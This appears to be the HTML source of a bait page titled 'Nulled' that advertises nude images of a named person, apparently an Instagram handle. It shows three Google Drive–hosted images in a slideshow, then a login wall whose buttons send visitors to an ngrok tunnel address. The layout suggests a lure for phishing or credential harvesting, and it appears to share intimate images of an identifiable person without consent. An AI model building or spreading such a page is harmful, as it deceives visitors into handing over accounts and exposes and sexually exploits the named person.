<!doctype html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />

        <title>Nulled</title>
    </head>
    <style>
        body {
            background: #111111;
        }
        .logo {
            color: white;
            position: relative;
            text-align: center;
            top: 100px;
            font-size: 80px;
            font-weight: 100;
        }
        .title {
            color: white;
            position: relative;
            text-align: center;
            top: 150px;
            font-weight: 100;
            font-size: 38px;
        }

        .image {
            width: 50px;
            position: relative;
            top: 450px;
            left: 194px;
            z-index: 2;
        }

        * {
            box-sizing: border-box;
        }

        /* Slideshow container */
        .slideshow-container {
            max-width: 1000px;
            position: relative;
            margin: auto;
            top: 163px;
            width: 600px;
        }

        /* Hide the images by default */
        .mySlides {
            display: none;
        }

        /* Next & previous buttons */
        .prev,
        .next {
            cursor: pointer;
            position: absolute;
            top: 50%;
            width: auto;
            margin-top: -22px;
            padding: 16px;
            color: white;
            font-weight: bold;
            font-size: 18px;
            transition: 0.6s ease;
            border-radius: 0 3px 3px 0;
            user-select: none;
        }

        /* Position the "next button" to the right */
        .next {
            right: 0;
            border-radius: 3px 0 0 3px;
        }

        /* On hover, add a black background color with a little bit see-through */
        .prev:hover,
        .next:hover {
            background-color: rgba(0, 0, 0, 0.8);
        }
        .container {
            width: 587px;
            height: 550px;
            background-color: white;
        }
        .need {
            font-size: 30px;
            text-align: center;
            position: relative;
            top: 25px;
            font-weight: 100;
        }
        .loginbtn {
            position: relative;
            top: 25px;
            width: 300px;
            height: 75px;
            left: 0px;
            font-size: 25px;
        }
       
        .create {
            position: relative;
            top: 62px;
            width: 300px;
            height: 75px;
            right: 0px;
            font-size: 25px;
        }
        /* Caption text */
        .text {
            color: #f2f2f2;
            font-size: 15px;
            padding: 8px 12px;
            position: absolute;
            bottom: 8px;
            width: 100%;
            text-align: center;
        }

        /* Number text (1/3 etc) */
        .numbertext {
            color: #f2f2f2;
            font-size: 12px;
            padding: 8px 12px;
            position: absolute;
            top: 0;
        }

        /* The dots/bullets/indicators */
        .dot {
            cursor: pointer;
            height: 15px;
            width: 15px;
            margin: 0 2px;
            background-color: #bbb;
            border-radius: 50%;
            display: inline-block;
            transition: background-color 0.6s ease;
        }

        .active,
        .dot:hover {
            background-color: #717171;
        }

        /* Fading animation */
        .fade {
            animation-name: fade;
            animation-duration: 1.5s;
        }

        @keyframes fade {
            from {
                opacity: 0.4;
            }
            to {
                opacity: 1;
            }
        }
    </style>
    <header>
        <h1 class="logo">Nulled</h1>
    </header>
    <body>
        
        <h2 class="title">Nudes von xmelinamelix</h2>
        <div class="slideshow-container">
            <!-- Full-width images with number and caption text -->
            <div class="mySlides fade">
    <div class="numbertext">1 / 9</div>
    <img class="melina1" src="https://drive.google.com/thumbnail?id=1bq70ihnMmaHCl7m94PBnQIKiV6j9C6Nx" style="width:100%">
    <div class="text">Caption Text</div>
  </div>

  <div class="mySlides fade">
    <div class="numbertext">2 / 9</div>
    <img class="melina2" src="https://drive.google.com/thumbnail?id=1ctE94SxG3mZP0WbzVgwt5WOewLPxvalX" style="width:100%">
    <div class="text">Caption Two</div>
  </div>

  <div class="mySlides fade">
    <div class="numbertext">3 / 9</div>
    <img class="melina3" src="https://drive.google.com/thumbnail?id=1FlPcLXAP1DB7udeomZ-9k4Aa18wbZuZq" style="width:100%">
    <div class="text">Caption Three</div>
  </div>

            <div class="mySlides fade">
                <div class="numbertext">4 / 9</div>
                <div class="container">
                    <h5 class="need">
                        You need to login<br />
                        or create an Account<br />
                        to continue
                    </h5>
                    <script>
            let slideIndex = 1;
            showSlides(slideIndex);

            // Next/previous controls
            function plusSlides(n) {
                showSlides((slideIndex += n));
            }

            // Thumbnail image controls
            function currentSlide(n) {
                showSlides((slideIndex = n));
            }

            function showSlides(n) {
                let i;
                let slides = document.getElementsByClassName("mySlides");
                let dots = document.getElementsByClassName("dot");
                if (n > slides.length) {
                    slideIndex = 1;
                }
                if (n < 1) {
                    slideIndex = slides.length;
                }
                for (i = 0; i < slides.length; i++) {
                    slides[i].style.display = "none";
                }
                for (i = 0; i < dots.length; i++) {
                    dots[i].className = dots[i].className.replace(
                        " active",
                        ""
                    );
                }
                slides[slideIndex - 1].style.display = "block";
                dots[slideIndex - 1].className += " active";
            }
        </script>
                    <center>
                        <a href="https://d2b1-93-227-198-11.ngrok-free.app">
                        <button class="loginbtn" href="">Login</button>
                        </a>
                        <a href="https://d2b1-93-227-198-11.ngrok-free.app">
                            <button class="create">Create an Account</button>
                        </a>
                    </center>
                </div>
            </div>
            <!-- Next and previous buttons -->
            <a class="prev" onclick="plusSlides(-1)">&#10094;</a>
            <a class="next" onclick="plusSlides(1)">&#10095;</a>
        </div>
        <br />

        <!-- The dots/circles -->
        <div style="text-align: center">
            <span class="dot" onclick="currentSlide(1)"></span>
            <span class="dot" onclick="currentSlide(2)"></span>
            <span class="dot" onclick="currentSlide(3)"></span>
        </div>
    </body>
</html>

